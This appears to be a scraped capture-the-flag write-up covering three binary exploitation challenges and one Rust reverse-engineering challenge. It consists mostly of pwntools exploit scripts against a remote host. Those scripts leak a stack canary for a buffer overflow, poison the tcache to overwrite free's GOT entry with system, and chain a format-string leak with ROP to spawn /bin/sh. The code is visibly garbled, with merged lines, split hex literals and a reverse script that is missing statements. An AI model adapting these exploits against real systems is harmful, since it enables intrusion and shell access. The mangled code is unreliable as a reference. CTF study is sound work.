of course, I don’t suggest to join the compeletion.
PWN-genius 输入no
输入thanks
leak cannary & overflower.
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 from pwn import *context .log_level = 'debug'io = remote("101.200.155.151" ,12000 )io .sendline(b"no" )io .sendline(b'thanks')init_addr = 0 x4011 A7 payload = b'a' * 24 + b'b'payload1 = b'a' * 0 x20 + p64 (0 xdeadbeef) + p64 (init_addr) io .send(payload)io .recvuntil(b'aaaab')canary_var =b'\x00 ' + io.recv(7 ) # + b'\x00 'canary_var = u64 (canary_var)print ("cur_cannary_var:" , hex(canary_var))payload1 = b'a' * 24 + p64 (canary_var) + p64 (0 xdeadbeef) + p64 (init_addr) io .sendline(payload1 )io .interactive()
PWN-program use ida to analysis program, ida open this so, finding the so version is 2.31.
find the edit function is not compare the length . so we can ablity any write other heap block.
because use libc 2.31. so we can use tache bins attack, reference: https://github.com/shellphish/how2heap/blob/master/glibc_2.31/tcache_poisoning.c
to alloc to manager_block , and then struct a arbitrary address write. write system_libc to got_free. and then call free to release a heap block. the heap block ‘content is /bin/sh. execute /bin/sh command compelete the exploit.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 from pwn import *io = remote("101.200.155.151" ,12300 )libc = ELF("./attachment-23.so" )def add(index, size):io .sendlineafter(b'choice:\n', b'1 ')io .sendlineafter(b'index:\n', str(index).encode())io .sendlineafter(b'size:\n', str(size).encode())def dele(index):io .sendlineafter(b'choice:\n', b'2 ')io .sendlineafter(b'index:\n', str(index).encode())def edit(index, size, content):io .sendlineafter(b'choice:\n', b'3 ')io .sendlineafter(b'index:\n', str(index).encode())io .sendlineafter(b'length:\n', str(size).encode())io .sendafter(b'content:\n', content)def show(index):io .sendlineafter(b'choice:\n', b'4 ')io .sendlineafter(b'index:\n', str(index).encode())add (0 , 0 x20 )add (1 , 0 x20 )add (2 , 0 x20 )add (3 , 0 x20 )edit (3 , 8 , b'/bin/sh\x00 ')dele (2 )dele (1 )payload = b'a' * 0 x20 +p64 (0 ) + p64 (0 x31 ) + p64 (0 x4040 C0 )edit (0 , len(payload), payload)add (1 , 0 x20 )add (2 , 0 x20 )payload = p64 (0 x404018 ) + p64 (0 x404018 )edit (2 , len(payload), payload)show (0 )cur_addr = io.recv(6 ) + b'\x00 \x00 'cur_addr = u64 (cur_addr)print ("cur_addr:" , hex(cur_addr))libc .address = cur_addr - libc.sym['free'] payload = p64 (libc.sym['system'])edit (1 , len(payload), payload)dele (3 )io .interactive()
off course , we can use other method to attack the vuln program!
PWN-Fufu 格式化字符串+ 栈溢出
格式化字符串泄露 libc地址和 CanaryCookie 值
格式化字符串漏洞点
栈溢出点
exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 from pwn import *io = remote("101.200.155.151" , 12600 )local = Falsedef leak_data(s):io .sendlineafter(b'Furina: Your choice? >> ', b'1 ')io .sendlineafter(b'Furina: Time is limited! >> ', b'6 ')io .sendlineafter(b'Furina: Present your evidence! >> ', s)def exploit(s):io .sendlineafter(b'Furina: Your choice? >> ', b'2 ')io .sendlineafter(b'Furina: The trial is adjourned', s)leak_data (b'%21 $p')canary = int(io.recv(len('0 x97 dac0759 ad25 c00 ')), 16 )io .sendline(b'1 ')leak_data (b'%23 $p')libc_main_ret = int(io.recv(len('0 x7 ffff7 c23 a90 ')), 16 )io .sendline(b'1 ')print ("canary:" , hex(canary))print ("libc:" , hex(libc_main_ret))if local:libc_base = libc_main_ret - 0 x23 a90 o_pop_rdi = 0 x00000000000240 e5 o_system = 0 x000000000004 ebf0 o_bin_sh_addr = 0 x1 b51 d2 else :libc_base = libc_main_ret - 0 x29 d90 o_pop_rdi = 0 x000000000002 a3 e5 o_system = 0 x050 d70 o_bin_sh_addr = 0 x1 d8678 pop_rdi = libc_base + o_pop_rdisystem_addr = libc_base + o_systembin_sh_addr = libc_base + o_bin_sh_addrpayload = b'a' * 72 + p64 (canary) + p64 (0 xdeadbeef) + p64 (pop_rdi+1 ) +p64 (pop_rdi) + p64 (bin_sh_addr) + p64 (system_addr)exploit (payload)io .interactive()
Reverse-greeting Rust lanage reverse
search string , quickly get import location.
have antidebug. IsDebuggerPresent,
analysis the fucntion.
so write a python script. to simalution enc, and decrypt the str get flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 """ v30 = (0xCCCCCCCCCCCCCCCDuLL * (unsigned __int128)(unsigned __int64)i) >> 64; LOBYTE(v30) = (unsigned __int8)v30 >> 2; v31 = __ROL1__(v27[i] ^ (i + 90), i - 5 * v30); """ def __rol__ (a, b ):return (a << (b) | a >> (8 -b)) & 0xff def ror (a, b ):return (a >> (b) | a << (8 -b)) & 0xff 'dsfsfadsfsfsfsd' 1 for i in range (len (s)): ord (s[i]) 0xCCCCCCCCCCCCCCCD * i) >> 64 2 90 ) 0xff 5 * v30) print (hex (cur_f)) print () 0x13 , 0x10 , 0x7C , 0xF0 , 0x52 , 0x67 , 0x52 , 0xCC , 0x79 , 0x55 , 0x0C , 0x48 , 0x59 , 0 , 0xa0 ,0x14 ] for i in range (len (s)): 0xCCCCCCCCCCCCCCCD * i) >> 64 2 0xff 5 * v30) 90 ) 0xff print (chr (cur_f), end='' )
